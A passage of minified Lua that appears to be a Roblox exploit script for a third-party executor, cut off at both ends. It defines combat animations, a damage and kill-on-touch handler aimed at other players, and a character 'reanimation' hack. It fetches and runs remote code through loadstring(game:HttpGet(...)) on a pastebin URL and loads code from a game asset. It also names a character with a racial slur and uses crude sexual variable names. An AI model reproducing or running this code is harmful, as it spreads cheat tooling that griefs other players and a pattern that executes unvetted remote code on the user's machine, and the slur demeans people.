red"),jQ.CFrame,1,1,1,86.5,86.5,86.5,0.05)BlockEffect(BrickColor.new("Gold"),jQ.CFrame,1,1,1,87,87,87,0.05)BlockEffect(BrickColor.new("Gold"),jQ.CFrame,1,1,1,87,87,87,0.05)MagniKILL(jQ,80,0,"Normal")end;game:GetService("Debris"):AddItem(jQ,0)end end until bA<=0 end))end;shoottraildd3=function(mouse,jK,jL,jR)local jM=Vector3.new(math.random(-jL,jL),math.random(-jL,jL),math.random(-jL,jL))local jN=jK.Position;local jO=mouse+jM;local jP=CFrame.new((jN+jO)/2,jO)local speed=200;local bA=0;coroutine.resume(coroutine.create(function()repeat swait()local hit,pos=rayCast(jN,jP.lookVector,speed,RootPart.Parent)local gO=(jN-pos).magnitude;Laser(BrickColor.new("White"),CFrame.new((jN+pos)/2,pos)*angles(1.57,0,0),1,gO*speed/(speed/2),1,-0.375,0,-0.375,0.05)jN=jN+jP.lookVector*speed;bA=bA-1;jP=jP*angles(math.rad(-1),0,0)if hit~=nil then bA=0;local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)BlockEffect(BrickColor.new("Pastel light red"),jQ.CFrame,1,1,1,7,7,7,0.05)game:GetService("Debris"):AddItem(jQ,2)end;do if bA<=0 then local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)if hit~=nil then CreateSound("http://www.roblox.com/asset/?id=514867425",jQ,2,1)BlockEffect(BrickColor.new("White"),jQ.CFrame,1,1,1,6.5,6.5,6.5,0.05)BlockEffect(BrickColor.new("Pastel light red"),jQ.CFrame,1,1,1,7,7,7,0.05)MagniDamage(jQ,6,jR,jR,0,"Slowness")end;game:GetService("Debris"):AddItem(jQ,0)end end until bA<=0 end))end;shoottraildd4=function(mouse,jK,jL,jR)local jM=Vector3.new(math.random(-jL,jL),math.random(-jL,jL),math.random(-jL,jL))local jN=jK.Position;local jO=mouse+jM;local jP=CFrame.new((jN+jO)/2,jO)local speed=150;local bA=1;coroutine.resume(coroutine.create(function()repeat swait()local hit,pos=rayCast(jN,jP.lookVector,speed,RootPart.Parent)local gO=(jN-pos).magnitude;Laser(BrickColor.new("Gold"),CFrame.new((jN+pos)/2,pos)*angles(1.57,0,0),1,gO*speed/(speed/2),1,-1.175,0,-1.175,0.15)jN=jN+jP.lookVector*speed;bA=bA-1;jP=jP*angles(math.rad(-1),0,0)if hit~=nil then bA=0;local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)game:GetService("Debris"):AddItem(jQ,2)end;do if bA<=0 then local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)if hit~=nil then CreateSound("http://www.roblox.com/asset/?id=514867425",jQ,2,1)BlockEffect(BrickColor.new("Really red"),jQ.CFrame,1,1,1,6.5,6.5,6.5,0.05)BlockEffect(BrickColor.new("Gold"),jQ.CFrame,1,1,1,7,7,7,0.05)BlockEffect(BrickColor.new("Gold"),jQ.CFrame,1,1,1,7,7,7,0.05)MagniDamage(jQ,6,jR,jR,0,"Normal")end;game:GetService("Debris"):AddItem(jQ,0)end end until bA<=0 end))end;HitpartFunk3=function(jS,jT,jU,jV)Hitpart3=Instance.new("Part",jS)RemoveOutlines(Hitpart3)Hitpart3.Size=Vector3.new(1,1,1)Hitpart3.CanCollide=false;HuW3=Instance.new("Weld")HuW3.Name="GuW"HuW3.Part0=jS;HuW3.C0=cn(jT,jU,jV)HuW3.C1=cn(0,0,0)HuW3.Part1=Hitpart3;HuW3.Parent=jS;Hitpart3.Transparency=1;game:GetService("Debris"):AddItem(Hitpart3,20)end;HitpartFunk2=function(jW,jT,jU,jV)Hitpart2=Instance.new("Part",jW)RemoveOutlines(Hitpart2)Hitpart2.Size=Vector3.new(1,1,1)Hitpart2.CanCollide=false;HuW2=Instance.new("Weld")HuW2.Name="GuW"HuW2.Part0=jW;HuW2.C0=cn(jT,jU,jV)HuW2.C1=cn(0,0,0)HuW2.Part1=Hitpart2;HuW2.Parent=jW;Hitpart2.Transparency=1;game:GetService("Debris"):AddItem(Hitpart2,20)end;HitpartFunk=function(jA,jC,eU,jT,jU,jV,jX,jY)Hitpart=Instance.new("Part",jA)RemoveOutlines(Hitpart)Hitpart.Size=Vector3.new(1,1,1)Hitpart.CanCollide=false;HuW=Instance.new("Weld")HuW.Name="GuW"HuW.Part0=jA;HuW.C0=cn(jT,jU,jV)HuW.C1=cn(0,0,0)HuW.Part1=Hitpart;HuW.Parent=jA;Hitpart.Transparency=1;game:GetService("Debris"):AddItem(Hitpart2,20)MagniDamage(Hitpart,4.5,jC,eU,jY,jX)end;HitpartFunk4=function(jA,jC,eU,jT,jU,jV,jX,jY)Hitpart4=Instance.new("Part",jA)RemoveOutlines(Hitpart4)Hitpart4.Size=Vector3.new(1,1,1)Hitpart4.CanCollide=false;HuW4=Instance.new("Weld")HuW4.Name="HuW4"HuW4.Part0=jA;HuW4.C0=cn(jT,jU,jV)HuW4.C1=cn(0,0,0)HuW4.Part1=Hitpart4;HuW4.Parent=jA;Hitpart4.Transparency=1;game:GetService("Debris"):AddItem(Hitpart4,1.5)MagniDamage(Hitpart4,6.5,jC,eU,jY,jX)end;HitboxFunction=function(jZ,j_,k0,k1,k2,k3,jC,eU,jY,jX)Hitboxpart=Instance.new("Part",Character)RemoveOutlines(Hitboxpart)Hitboxpart.Size=Vector3.new(k0,k1,k2)Hitboxpart.CanCollide=false;Hitboxpart.Transparency=1;Hitboxpart.Anchored=true;Hitboxpart.CFrame=jZ;game:GetService("Debris"):AddItem(Hitboxpart,j_)MagniDamage(Hitboxpart,k3,jC,eU,jY,jX)end;wait2=false;combo=1;duljump=false;duljump2=false;jumpatck=false;mouse.KeyDown:connect(function(O)if O=="0"then Runkey=true end;if O=="r"then broski=-1.6;cum=-45;cockand=20;balltorture=-20;bruhmomento=0 end;if O=="t"then broski=-10;cum=-45;cockand=20;balltorture=-20;bruhmomento=0 end;if O=="y"then broski=-0.8;cum=-90;cockand=40;balltorture=-40;bruhmomento=0 end;if O=="n"then broski=-1.6;cum=-45;cockand=20;balltorture=-20;bruhmomento=45 end;if O=="m"then broski=-1.6;cum=-45;cockand=20;balltorture=-20;bruhmomento=-45 end;if O=="e"and dS==false then dS=true;Humanoid.WalkSpeed=0;CreateSound("http://www.roblox.com/asset/?id=269606471",Torso,2,1)for T=0,2,0.1 do swait()RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-30-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(135-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.2)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(135-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.2)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;for T=0,4,0.1 do swait()RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-0-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(25)),0.05)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(-25)),0.05)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;for T=0,1 do for T=0,1,0.1 do swait()RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-30-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;for T=0,1,0.1 do swait()RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-15-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end end;Humanoid.WalkSpeed=16;dS=false end end)hitwait=false;function onTouch(ec)local a8=ec.Parent:findFirstChild("Humanoid")local k4=ec.Parent;local torso=ec.Parent:FindFirstChild("Torso")local head=ec.Parent:findFirstChild("Head")local k5=ec.Parent:findFirstChild("Left Leg")local k6=ec.Parent:findFirstChild("Right Leg")local k7=ec.Parent:findFirstChild("Left Arm")local dp=ec.Parent:findFirstChild("Right Arm")if hitwait==false and dS==false and k4.Name=="Effects"==false and Runkey==true then hitwait=true;if a8~=nil and a8.Health>0.01 and id>1 then if IKM==true then Effects.Sphere.Create(BrickColor.new("Really black"),FrontPart.CFrame*cn(0,-0,0),50,50,50,40,40,40,0.1)Effects.Sphere.Create(BrickColor.new("Really red"),FrontPart.CFrame*cn(0,-0,0),50,50,50,20,20,20,0.05)k4:BreakJoints()else Effects.Sphere.Create(BrickColor.new("White"),FrontPart.CFrame*cn(0,-0,2),100,100,.1,12,12,0,0.1)Effects.Sphere.Create(BrickColor.new("White"),FrontPart.CFrame*cn(0,-0,2),100,100,20,1,1,1,0.08)MagniDamage(FrontPart,6.5,6,6,.3,"Knockdown")end;dS=true;Humanoid.WalkSpeed=0;local gv=Create("BodyVelocity")({velocity=Vector3.new(0,1,0)-RootPart.CFrame.lookVector*1500,P=50000,maxForce=Vector3.new(80000,80000,80000),Parent=Torso})game:GetService("Debris"):AddItem(gv,0.11)for T=0,.5,0.1 do swait()RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,1,-0.5)*angles(math.rad(1),math.rad(0),math.rad(0)),.2)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-30-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.2)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.2)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.3)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.3)end;Humanoid.WalkSpeed=16 end;dS=false;wait(.08)hitwait=false end end;FrontPart.Touched:connect(onTouch)mouse.KeyUp:connect(function(O)if O=="0"then Runkey=false end end)humHsave=Humanoid.Health;function GainCharge(Humanoid)if Humanoid.Health==0 then ia=false end;if blocking==true then humDsave=Humanoid.Health;humDsave=humHsave-humDsave;if humDsave>0.01 then CFuncs.Sound.Create("http://www.roblox.com/asset/?id=260433850",Torso,1,.5)BlockEffect(BrickColor.new("Really red"),Torso.CFrame,42,42,22,0.1,0.1,0.1,0.02,2)BlockEffect(BrickColor.new("Really red"),RightArm.CFrame,22,42,22,0.1,0.1,0.1,0.02,2)BlockEffect(BrickColor.new("Really red"),LeftArm.CFrame,22,42,22,0.1,0.1,0.1,0.02,2)BlockEffect(BrickColor.new("Really red"),RightLeg.CFrame,22,42,22,0.1,0.1,0.1,0.02,2)BlockEffect(BrickColor.new("Really red"),LeftLeg.CFrame,22,42,22,0.1,0.1,0.1,0.02,2)humDsave=humDsave/3 end;if humDsave<0 then Effects.Sphere.Create(BrickColor.new("Lime green"),RootPart.CFrame*cn(0,-2.97,0),10,5,10,15,-.1,15,0.05)humDsave=humDsave*2.5 end;humHsave=humHsave-humDsave end end;Humanoid.HealthChanged:connect(function()GainCharge(Humanoid)end)OnDeath=function()ia=false end;Humanoid.Died:connect(function()OnDeath(Character)end)Character.HumanoidRootPart.Anchored=true;W(R.car.Handle,Character.BumperCar.Part14)R.car.Handle.Attachment.Rotation=Vector3.new(180,0,180)Character.BumperCar:WaitForChild("Part14"):FindFirstChild("Attachment").Name="Attachment69"Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.1,0.5)Character.HumanoidRootPart.Anchored=false end)end;function Clickey7()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local L=game:GetService("Players").LocalPlayer.Name;local M=workspace:WaitForChild(L)local R={tiddie=Character:WaitForChild("Memorial Day 2009 Army Helmet"),othertiddie=Character:WaitForChild("Racing Helmet Flames"),behindzatiddie=Character:WaitForChild("Racing Helmet"),behindzaothertiddie=Character:WaitForChild("Racing Helmet USA"),vaggie=Character:WaitForChild("Stinger77")}local S={nipples=Character:WaitForChild("FluffyEarringsAccessory"),lips=Character:WaitForChild("Red Beak")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=200;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=200 end;Players=game:GetService('Players')LocalPlayer=Players.LocalPlayer;Char=LocalPlayer.Character;Char.Archivable=true;FakeChar=Char:Clone()FakeChar.Parent=workspace;workspace.CurrentCamera.CameraSubject=FakeChar.Humanoid;for T,v in pairs(FakeChar:GetDescendants())do if v:IsA("Part")then v.Transparency=1 end;if v:IsA("SpecialMesh")then v.MeshId="rbxassetid://0"end end;game:GetService('RunService').Stepped:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)game:GetService('RunService').RenderStepped:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)game:GetService('RunService').Heartbeat:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)function died()LocalPlayer.Character=Char;FakeChar:Destroy()Char:BreakJoints()end;function Align(aA,Part0,i,k8)local k9=Instance.new('AlignPosition',aA)k9.Parent.CanCollide=false;k9.ApplyAtCenterOfMass=true;k9.MaxForce=67752;k9.MaxVelocity=math.huge/9e110;k9.ReactionForceEnabled=false;k9.Responsiveness=math.huge;k9.RigidityEnabled=false;local ka=Instance.new('AlignOrientation',aA)ka.MaxAngularVelocity=math.huge/9e110;ka.MaxTorque=67752;ka.PrimaryAxisOnly=false;ka.ReactionTorqueEnabled=false;ka.Responsiveness=math.huge;ka.RigidityEnabled=false;local kb=Instance.new('Attachment',aA)local kc=Instance.new('Attachment',Part0)kc.Orientation=k8;kc.Position=i;k9.Attachment0=kb;k9.Attachment1=kc;ka.Attachment0=kb;ka.Attachment1=kc end;function LoadLibrary(a)return loadstring(game:HttpGet("https://pastebin.com/raw/KstdzZVB",true))()end;Char.Torso['Right Shoulder']:Destroy()Char.Torso['Left Shoulder']:Destroy()Char.Torso['Right Hip']:Destroy()Char.Torso['Left Hip']:Destroy()Char.HumanoidRootPart['RootJoint']:Destroy()Char.HumanoidRootPart.Anchored=true;Char.Humanoid.PlatformStand=true;FakeChar['Torso'].Position=Char['Torso'].Position;for T,v in pairs(Char:GetChildren())do if v:IsA("Part")and v.Name~="Head"then if v.Name=="Torso"then Align(Char[v.Name],FakeChar[v.Name],Vector3.new(0,0.5,0),Vector3.new(0,0,0))else Align(Char[v.Name],FakeChar[v.Name],Vector3.new(0,0,0),Vector3.new(0,0,0))end end end;FakeChar.Humanoid.Died:Connect(died)Char.Humanoid.Died:Connect(died)LocalPlayer.Character=FakeChar;FakeChar.Name="nigra"wait(1)for T,v in next,R do v.Handle.Anchored=true end;for T,v in next,S do v.Handle.Anchored=true end;game["Run Service"].Stepped:connect(function()local kd=game:GetService("Players").LocalPlayer.Character:FindFirstChild("HingeConstraint")if kd then kd:Remove()end end)local TweenService=game:GetService("TweenService")loadstring(game:GetObjects("rbxassetid://5728837072")[1].Source)()local dz=LoadLibrary("RbxUtility")local Create=dz.Create;local Player=game:GetService("Players").LocalPlayer;ZTfade=false;ZT=false;Character=Player.Character;EffectPack=Character.Extras:Clone()Character.Extras:Destroy()local ke=false;Target=Vector3.new()Torso=Character.Torso;Torso.Transparency=0;Head=Character.Head;Humanoid=Character.Humanoid;LeftArm=Character["Left Arm"]LeftLeg=Character["Left Leg"]RightArm=Character["Right Arm"]RightLeg=Character["Right Leg"]RootPart=Character["HumanoidRootPart"]local N="Idle"local mouse=Player:GetMouse()local dO=0;local dP=0;local dQ=0;local dR=1;local kf=false;local kg=false;local kh=false;local ki=false;Animstep=0;WalkAnimMove=0.05;Combo=0;local dS=false;local kj=false;local kk=false;local dT=Character.HumanoidRootPart:FindFirstChild("RootJoint")local Neck=Character.Torso:FindFirstChild("Neck")local RootCF=CFrame.fromEulerAnglesXYZ(-1.57,0,3.14)local NeckCF=CFrame.new(0,1,0,-1,-0,-0,0,0,1,0,1,0)local dU=0;local dV=0;Effects=Instance.new("Folder",Character)Effects.Name="Effects"it=Instance.new;vt=Vector3.new;cf=CFrame.new;euler=CFrame.fromEulerAnglesXYZ;angles=CFrame.Angles;local cn=CFrame.new;mr=math.rad;mememode=false;IT=Instance.new;CF=CFrame.new;VT=Vector3.new;RAD=math.rad;C3=Color3.new;UD2=UDim2.new;BRICKC=BrickColor.new;ANGLES=CFrame.Angles;EULER=CFrame.fromEulerAnglesXYZ;COS=math.cos;ACOS=math.acos;SIN=math.sin;ASIN=math.asin;ABS=math.abs;MRANDOM=math.random;FLOOR=math.floor;local dZ="http://www.roblox.com/asset/?id=3852221223"local d_=it("Sound",Torso)local e0=1;d_.EmitterSize=30;local e1=d_:Clone()playsong=true;d_.SoundId=dZ;if playsong==true then wait(2)d_:play()elseif playsong==false then d_:stop()end;lastsongpos=0;crosshair=Instance.new("BillboardGui",Character)crosshair.Size=UDim2.new(10,0,10,0)crosshair.Enabled=false;imgl=Instance.new("ImageLabel",crosshair)imgl.Position=UDim2.new(0,0,0,0)imgl.Size=UDim2.new(1,0,1,0)imgl.Image="rbxassetid://578065407"imgl.BackgroundTransparency=1;imgl.ImageTransparency=.7;imgl.ImageColor3=Color3.new(1,1,1)crosshair.StudsOffset=Vector3.new(0,0,-1)local e2=1544355717;local e3=528589382;local e4=376976397;local e5=459523898;local e6=424195979;local e7=698824317;local e8=874376217;local e9=231917744;local ea=168513088;local eb=299058146;local kl=Instance.new("Weld")local km=Instance.new("Weld")local kn=Instance.new("Part")local ko=Instance.new("Part")local kp=Instance.new("Model")if Character:FindFirstChild("Animate")then Character.Animate:Destroy()end;function RemoveOutlines(ec)ec.TopSurface,ec.BottomSurface,ec.LeftSurface,ec.RightSurface,ec.FrontSurface,ec.BackSurface=10,10,10,10,10,10 end;CFuncs={Part={Create=function(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part")({Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee})RemoveOutlines(Part)return Part end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Weld={Create=function(ed,Part0,aA,eo,ep)local Weld=Create("Weld")({Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep})return Weld end},Sound={Create=function(eq,par,er,pit)coroutine.resume(coroutine.create(function()local dA=Create("Sound")({Volume=er,Pitch=pit or 1,SoundId="http://www.roblox.com/asset/?id="..eq,Parent=par or workspace})wait()dA:play()game:GetService("Debris"):AddItem(dA,6)end))end},ParticleEmitter={Create=function(ed,es,et,eu,k,ev,eg,ew,ex,ey,ez,eA,eB,eC,eD,eE,eF,eG,l,eH)local eI=Create("ParticleEmitter")({Parent=ed,Color=ColorSequence.new(es,et),LightEmission=eu,Size=k,Texture=ev,Transparency=eg,ZOffset=ew,Acceleration=ex,Drag=ey,LockedToPart=ez,VelocityInheritance=eA,EmissionDirection=eB,Enabled=eC,Lifetime=eD,Rate=eE,Rotation=eF,RotSpeed=eG,Speed=l,VelocitySpread=eH})return eI end}}wait(0.1)eyes=Instance.new("Decal",Head)eyes.Face="Front"mouth=Instance.new("Decal",Head)mouth.Face="Front"brows=Instance.new("Decal",Head)brows.Face="Front"blush=Instance.new("Decal",Head)blush.Face="Front"extra=Instance.new("Decal",Head)extra.Face="Front"coroutine.resume(coroutine.create(function()wait(.5)for T,v in pairs(Character:GetDescendants())do if v:IsA("Accessory")or v:IsA("Shirt")or v:IsA("Pants")or v:IsA("CharacterMesh")or v:IsA("Hat")or v:IsA("BodyColors")then end end;local eJ=EffectPack.Outfit:Clone()for T,v in pairs(eJ:GetChildren())do if v:IsA("Shirt")or v:IsA("Pants")or v:IsA("BodyColors")or v:IsA("CharacterMesh")then end;if v:IsA("BasePart")then local eK=v:FindFirstChildOfClass("Attachment")local eL=nil;for T,eM in pairs(Character:GetDescendants())do if eM:IsA("Attachment")and eM.Name==eK.Name and eM.Parent.Parent==Character then eL=eM end end;kn.Name="Left"kn.Parent=Player.Character;kn.CFrame=CFrame.new(-0.864785671,5.40298271,1.08804584,0.00171390176,0.0015738951,0.999997795,0.0481499843,0.998839736,-0.00165481726,-0.998839498,0.0481527671,0.00163629651)kn.Orientation=Vector3.new(0.0900000036,89.9100037,2.75999999)kn.Position=Vector3.new(-0.864785671,5.40298271,1.08804584)kn.Rotation=Vector3.new(45.3199997,89.8799973,-42.5600014)kn.Color=Color3.new(0.0666667,0.0666667,0.0666667)kn.Size=Vector3.new(1.03999996,0.419999987,1.05999994)kn.BottomSurface=Enum.SurfaceType.Smooth;kn.BrickColor=BrickColor.new("Really black")kn.CanCollide=false;kn.Locked=true;kn.Material=Enum.Material.SmoothPlastic;kn.brickColor=BrickColor.new("Really black")kn.FormFactor=Enum.FormFactor.Symmetric;kn.formFactor=Enum.FormFactor.Symmetric;kl.Name="Left Leg"kl.Parent=kn;kl.C0=CFrame.new(0,-0.8,0)kl.Part0=kn;kl.Part1=LeftLeg;kl.part1=LeftLeg;ko.Name="Right"ko.Parent=Player.Character;ko.CFrame=CFrame.new(-0.862425506,5.4220829,2.09170222,-0.34028101,-0.0131851267,0.940231562,-0.0387370177,0.99925065,-6.86116982e-06,-0.939526379,-0.0364240296,-0.340536386)ko.Orientation=Vector3.new(0,109.910004,-2.22000003)ko.Position=Vector3.new(-0.862425506,5.4220829,2.09170222)ko.Rotation=Vector3.new(180,70.0899963,177.779999)ko.Color=Color3.new(0.0666667,0.0666667,0.0666667)ko.Size=Vector3.new(1.03999996,0.419999808,1.05999994)ko.BottomSurface=Enum.SurfaceType.Smooth;ko.BrickColor=BrickColor.new("Really black")ko.CanCollide=false;ko.Locked=true;ko.Material=Enum.Material.SmoothPlastic;ko.brickColor=BrickColor.new("Really black")ko.FormFactor=Enum.FormFactor.Symmetric;ko.formFactor=Enum.FormFactor.Symmetric;km.Name="Right Leg"km.Parent=ko;km.C0=CFrame.new(0,-0.8,0)km.Part0=ko;km.Part1=RightLeg;km.part1=RightLeg;local Model0=Instance.new("Model")local aA=Instance.new("Part")local kq=Instance.new("SpecialMesh")local kr=Instance.new("Weld")local Part4=Instance.new("Part")local ks=Instance.new("SpecialMesh")local kt=Instance.new("Weld")local ku=Instance.new("Part")local kv=Instance.new("SpecialMesh")local kw=Instance.new("Weld")local kx=Instance.new("Part")local ky=Instance.new("SpecialMesh")local kz=Instance.new("Weld")local kA=Instance.new("Part")local kB=Instance.new("SpecialMesh")local kC=Instance.new("Weld")local Part17=Instance.new("Part")local kD=Instance.new("SpecialMesh")local kE=Instance.new("Weld")local Part20=Instance.new("Part")local kF=Instance.new("SpecialMesh")local kG=Instance.new("Weld")local kH=Instance.new("Part")local kI=Instance.new("SpecialMesh")local kJ=Instance.new("Weld")Model0.Name="vag"Model0.Parent=Torso;Model0.PrimaryPart=aA;aA.Name="mainskin"aA.Parent=Model0;aA.CFrame=CFrame.new(-0.866321027,5.57360649,1.57845628,0.00160500058,-0.0125150038,0.999920428,0.999988377,-0.00454756292,-0.00166202663,0.00456800172,0.999911368,0.0125075588)aA.Orientation=Vector3.new(0.100000001,89.2799988,90.2600021)aA.Position=Vector3.new(-0.866321027,5.57360649,1.57845628)aA.Rotation=Vector3.new(7.57000017,89.2799988,82.6900024)aA.Color=Color3.new(1,0.8,0.6)aA.Size=Vector3.new(0.900895953,1.80179191,0.900895953)aA.Anchored=false;aA.BottomSurface=Enum.SurfaceType.Smooth;aA.BrickColor=BrickColor.new("Pastel brown")aA.CanCollide=false;aA.Material=Enum.Material.SmoothPlastic;aA.TopSurface=Enum.SurfaceType.Smooth;aA.brickColor=BrickColor.new("Pastel 